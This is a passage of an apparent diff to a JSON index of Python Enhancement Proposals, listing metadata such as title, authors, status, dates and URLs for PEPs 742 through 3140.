`08-Feb-2024 `__,", + "resolution": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403/88", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0741/" + }, + "742": { + "number": 742, + "title": "Narrowing types with TypeIs", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-742-narrowing-types-with-typenarrower/45613", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Feb-2024", + "python_version": "3.13", + "post_history": "`11-Feb-2024 `__", + "resolution": "`03-Apr-2024 `__", + "requires": null, + "replaces": "724", + "superseded_by": null, + "url": "https://peps.python.org/pep-0742/" + }, + "743": { + "number": 743, + "title": "Add Py_COMPAT_API_VERSION to the Python C API", + "authors": "Victor Stinner, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-743-add-py-compat-api-version-to-the-python-c-api-take-2/59323", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0743/" + }, + "744": { + "number": 744, + "title": "JIT Compilation", + "authors": "Brandt Bucher, Savannah Ostrowski", + "discussions_to": "https://discuss.python.org/t/pep-744-jit-compilation/50756", + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "11-Apr-2024", + "python_version": "3.13", + "post_history": "`11-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0744/" + }, + "745": { + "number": 745, + "title": "Python 3.14 Release Schedule", + "authors": "Hugo van Kemenade", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-Apr-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0745/" + }, + "746": { + "number": 746, + "title": "Type checking Annotated metadata", + "authors": "Adrian Garcia Badaracco", + "discussions_to": "https://discuss.python.org/t/pep-746-typedmetadata-for-type-checking-of-pep-593-annotated/53834", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "20-May-2024", + "python_version": "3.14", + "post_history": "20-May-2024", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0746/" + }, + "747": { + "number": 747, + "title": "Annotating Type Forms", + "authors": "David Foster, Eric Traut", + "discussions_to": "https://discuss.python.org/t/pep-747-typeexpr-type-hint-for-a-type-expression/55984", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "27-May-2024", + "python_version": "3.14", + "post_history": "`19-Apr-2024 `__, `04-May-2024 `__, `17-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0747/" + }, + "748": { + "number": 748, + "title": "A Unified TLS API for Python", + "authors": "Joop van de Pol, William Woodruff", + "discussions_to": "https://discuss.python.org/t/pre-pep-discussion-revival-of-pep-543/51263", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2024", + "python_version": "3.14", + "post_history": "`17-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": "543", + "superseded_by": null, + "url": "https://peps.python.org/pep-0748/" + }, + "749": { + "number": 749, + "title": "Implementing PEP 649", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-749-implementing-pep-649/54974", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-May-2024", + "python_version": "3.14", + "post_history": "`04-Jun-2024 `__", + "resolution": null, + "requires": "649", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0749/" + }, + "750": { + "number": 750, + "title": "Template Strings", + "authors": "Jim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck", + "discussions_to": "https://discuss.python.org/t/pep-750-tag-strings-for-writing-domain-specific-languages/60408", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "08-Jul-2024", + "python_version": "3.14", + "post_history": "`09-Aug-2024 `__, `17-Oct-2024 `__, `21-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0750/" + }, + "751": { + "number": 751, + "title": "A file format to record Python dependencies for installation reproducibility", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Jul-2024", + "python_version": null, + "post_history": "`25-Jul-2024 `__ `30-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": "665", + "superseded_by": null, + "url": "https://peps.python.org/pep-0751/" + }, + "752": { + "number": 752, + "title": "Implicit namespaces for package repositories", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63192", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Aug-2024", + "python_version": null, + "post_history": "`18-Aug-2024 `__, `07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0752/" + }, + "753": { + "number": 753, + "title": "Uniform project URLs in core metadata", + "authors": "William Woodruff, Facundo Tuesca", + "discussions_to": "https://discuss.python.org/t/pep-753-uniform-urls-in-core-metadata/62792", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Aug-2024", + "python_version": null, + "post_history": "`26-Aug-2024 `__, `03-Sep-2024 `__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0753/" + }, + "754": { + "number": 754, + "title": "IEEE 754 Floating Point Special Values", + "authors": "Gregory R. Warnes", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Mar-2003", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0754/" + }, + "755": { + "number": 755, + "title": "Implicit namespace policy for PyPI", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63191", + "status": "Draft", + "type": "Process", + "topic": "packaging", + "created": "05-Sep-2024", + "python_version": null, + "post_history": "`07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0755/" + }, + "756": { + "number": 756, + "title": "Add PyUnicode_Export() and PyUnicode_Import() C functions", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63891", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`29-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0756/" + }, + "757": { + "number": 757, + "title": "C API to import-export Python integers", + "authors": "Sergey B Kirpichev, Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63895", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`08-Dec-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0757/" + }, + "758": { + "number": 758, + "title": "Allow ``except`` and ``except*`` expressions without parentheses", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Sep-2024", + "python_version": "3.14", + "post_history": "`02-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0758/" + }, + "759": { + "number": 759, + "title": "External Wheel Hosting", + "authors": "Barry Warsaw, Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-759-external-wheel-hosting/66458", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0759/" + }, + "760": { + "number": 760, + "title": "No More Bare Excepts", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0760/" + }, + "761": { + "number": 761, + "title": "Deprecating PGP signatures for CPython artifacts", + "authors": "Seth Michael Larson", + "discussions_to": "https://discuss.python.org/t/pep-761-deprecating-pgp-signatures-for-cpython-artifacts/67180", + "status": "Active", + "type": "Process", + "topic": "", + "created": "08-Oct-2024", + "python_version": "3.14", + "post_history": "`25-Sep-2024 `__, `09-Oct-2024 `__", + "resolution": "`06-Nov-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0761/" + }, + "762": { + "number": 762, + "title": "REPL-acing the default REPL", + "authors": "Pablo Galindo Salgado, \u0141ukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2024", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0762/" + }, + "763": { + "number": 763, + "title": "Limiting deletions on PyPI", + "authors": "William Woodruff, Alexis Challande", + "discussions_to": "https://discuss.python.org/t/69487", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2024", + "python_version": null, + "post_history": "`09-Jul-2022 `__, `01-Oct-2024 `__, `28-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0763/" + }, + "765": { + "number": 765, + "title": "Disallow return/break/continue that exit a finally block", + "authors": "Irit Katriel, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-765-disallow-return-break-continue-that-exit-a-finally-block/71348", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Nov-2024 `__, `16-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": "601", + "superseded_by": null, + "url": "https://peps.python.org/pep-0765/" + }, + "766": { + "number": 766, + "title": "Explicit Priority Choices Among Multiple Indexes", + "authors": "Michael Sarahan", + "discussions_to": "https://discuss.python.org/t/pep-for-handling-multiple-indexes-index-priority/71589", + "status": "Draft", + "type": "Informational", + "topic": "packaging", + "created": "18-Nov-2024", + "python_version": null, + "post_history": "`18-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0766/" + }, + "767": { + "number": 767, + "title": "Annotating Read-Only Attributes", + "authors": "Eneg", + "discussions_to": "https://discuss.python.org/t/pep-767-annotating-read-only-attributes/73408", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "18-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0767/" + }, + "768": { + "number": 768, + "title": "Safe external debugger interface for CPython", + "authors": "Pablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic", + "discussions_to": "https://discuss.python.org/t/pep-768-safe-external-debugger-interface-for-cpython/73969", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "25-Nov-2024", + "python_version": "3.14", + "post_history": "`11-Dec-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0768/" + }, + "777": { + "number": 777, + "title": "How to Re-invent the Wheel", + "authors": "Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-777-how-to-re-invent-the-wheel/67484", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "09-Oct-2024", + "python_version": null, + "post_history": "`10-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0777/" + }, + "789": { + "number": 789, + "title": "Preventing task-cancellation bugs by limiting yield in async generators", + "authors": "Zac Hatfield-Dodds, Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/preventing-yield-inside-certain-context-managers/1091", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "14-May-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0789/" + }, + "801": { + "number": 801, + "title": "Reserved", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "21-Jun-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0801/" + }, + "2026": { + "number": 2026, + "title": "Calendar versioning for Python", + "authors": "Hugo van Kemenade", + "discussions_to": "https://discuss.python.org/t/pep-2026-calendar-versioning-for-python/55782", + "status": "Draft", + "type": "Process", + "topic": "", + "created": "11-Jun-2024", + "python_version": "3.26", + "post_history": "`14-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-2026/" + }, + "3000": { + "number": 3000, + "title": "Python 3000", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3000/" + }, + "3001": { + "number": 3001, + "title": "Procedure for reviewing and improving standard library modules", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3001/" + }, + "3002": { + "number": 3002, + "title": "Procedure for Backwards-Incompatible Changes", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "27-Mar-2006", + "python_version": null, + "post_history": "27-Mar-2006, 13-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3002/" + }, + "3003": { + "number": 3003, + "title": "Python Language Moratorium", + "authors": "Brett Cannon, Jesse Noller, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "21-Oct-2009", + "python_version": null, + "post_history": "03-Nov-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3003/" + }, + "3099": { + "number": 3099, + "title": "Things that will Not Change in Python 3000", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "04-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3099/" + }, + "3100": { + "number": 3100, + "title": "Miscellaneous Python 3.0 Plans", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Aug-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3100/" + }, + "3101": { + "number": 3101, + "title": "Advanced String Formatting", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3101/" + }, + "3102": { + "number": 3102, + "title": "Keyword-Only Arguments", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 19-May-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3102/" + }, + "3103": { + "number": 3103, + "title": "A Switch/Case Statement", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2006", + "python_version": "3.0", + "post_history": "26-Jun-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3103/" + }, + "3104": { + "number": 3104, + "title": "Access to Names in Outer Scopes", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Oct-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3104/" + }, + "3105": { + "number": 3105, + "title": "Make print a function", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3105/" + }, + "3106": { + "number": 3106, + "title": "Revamping dict.keys(), .values() and .items()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3106/" + }, + "3107": { + "number": 3107, + "title": "Function Annotations", + "authors": "Collin Winter, Tony Lownds", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3107/" + }, + "3108": { + "number": 3108, + "title": "Standard Library Reorganization", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2007", + "python_version": "3.0", + "post_history": "28-Apr-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3108/" + }, + "3109": { + "number": 3109, + "title": "Raising Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3109/" + }, + "3110": { + "number": 3110, + "title": "Catching Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3110/" + }, + "3111": { + "number": 3111, + "title": "Simple input built-in in Python 3000", + "authors": "Andre Roberge", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2006", + "python_version": "3.0", + "post_history": "22-Dec-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3111/" + }, + "3112": { + "number": 3112, + "title": "Bytes literals in Python 3000", + "authors": "Jason Orendorff", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2007", + "python_version": "3.0", + "post_history": "23-Feb-2007", + "resolution": null, + "requires": "358", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3112/" + }, + "3113": { + "number": 3113, + "title": "Removal of Tuple Parameter Unpacking", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Mar-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3113/" + }, + "3114": { + "number": 3114, + "title": "Renaming iterator.next() to iterator.__next__()", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3114/" + }, + "3115": { + "number": 3115, + "title": "Metaclasses in Python 3000", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Mar-2007", + "python_version": "3.0", + "post_history": "11-Mar-2007, 14-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3115/" + }, + "3116": { + "number": 3116, + "title": "New I/O", + "authors": "Daniel Stutzbach, Guido van Rossum, Mike Verdone", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2007", + "python_version": "3.0", + "post_history": "26-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3116/" + }, + "3117": { + "number": 3117, + "title": "Postfix type declarations", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3117/" + }, + "3118": { + "number": 3118, + "title": "Revising the buffer protocol", + "authors": "Travis Oliphant, Carl Banks", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3118/" + }, + "3119": { + "number": 3119, + "title": "Introducing Abstract Base Classes", + "authors": "Guido van Rossum, Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2007", + "python_version": "3.0", + "post_history": "26-Apr-2007, 11-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3119/" + }, + "3120": { + "number": 3120, + "title": "Using UTF-8 as the default source encoding", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3120/" + }, + "3121": { + "number": 3121, + "title": "Extension Module Initialization and Finalization", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3121/" + }, + "3122": { + "number": 3122, + "title": "Delineation of the main module", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3122/" + }, + "3123": { + "number": 3123, + "title": "Making PyObject_HEAD conform to standard C", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3123/" + }, + "3124": { + "number": 3124, + "title": "Overloading, Generic Functions, Interfaces, and Adaptation", + "authors": "Phillip J. Eby", + "discussions_to": "python-3000@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": "3107, 3115, 3119", + "replaces": "245, 246", + "superseded_by": null, + "url": "https://peps.python.org/pep-3124/" + }, + "3125": { + "number": 3125, + "title": "Remove Backslash Continuation", + "authors": "Jim J. Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 04-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3125/" + }, + "3126": { + "number": 3126, + "title": "Remove Implicit String Concatenation", + "authors": "Jim J. Jewett, Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3126/" + }, + "3127": { + "number": 3127, + "title": "Integer Literal Support and Syntax", + "authors": "Patrick Maupin", + "discussions_to": "python-3000@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2007", + "python_version": "3.0", + "post_history": "18-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3127/" + }, + "3128": { + "number": 3128, + "title": "BList: A Faster List-like Type", + "authors": "Daniel Stutzbach", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "2.6, 3.0", + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3128/" + }, + "3129": { + "number": 3129, + "title": "Class Decorators", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3129/" + }, + "3130": { + "number": 3130, + "title": "Access to Current Module/Class/Function", + "authors": "Jim J. Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2007", + "python_version": "3.0", + "post_history": "22-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3130/" + }, + "3131": { + "number": 3131, + "title": "Supporting Non-ASCII Identifiers", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3131/" + }, + "3132": { + "number": 3132, + "title": "Extended Iterable Unpacking", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3132/" + }, + "3133": { + "number": 3133, + "title": "Introducing Roles", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "13-May-2007", + "resolution": null, + "requires": "3115, 3129", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3133/" + }, + "3134": { + "number": 3134, + "title": "Exception Chaining and Embedded Tracebacks", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-May-2005", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3134/" + }, + "3135": { + "number": 3135, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney, Lie Ryan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "3.0", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__, `12-Mar-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3135/" + }, + "3136": { + "number": 3136, + "title": "Labeled break and continue", + "authors": "Matt Chisholm", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Jun-2007", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3136/" + }, + "3137": { + "number": 3137, + "title": "Immutable Bytes and Mutable Buffer", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2007", + "python_version": "3.0", + "post_history": "26-Sep-2007, 30-Sep-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3137/" + }, + "3138": { + "number": 3138, + "title": "String representation in Python 3000", + "authors": "Atsuo Ishimoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-May-2008", + "python_version": "3.0", + "post_history": "05-May-2008, 05-Jun-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3138/" + }, + "3139": { + "number": 3139, + "title": "Cleaning out sys and the \"interpreter\" module", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2008", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3139/" + }, + "3140": { + "number": 3140, + "title": "str(container) should call str(item), not repr(item)", + "authors": "Oleg 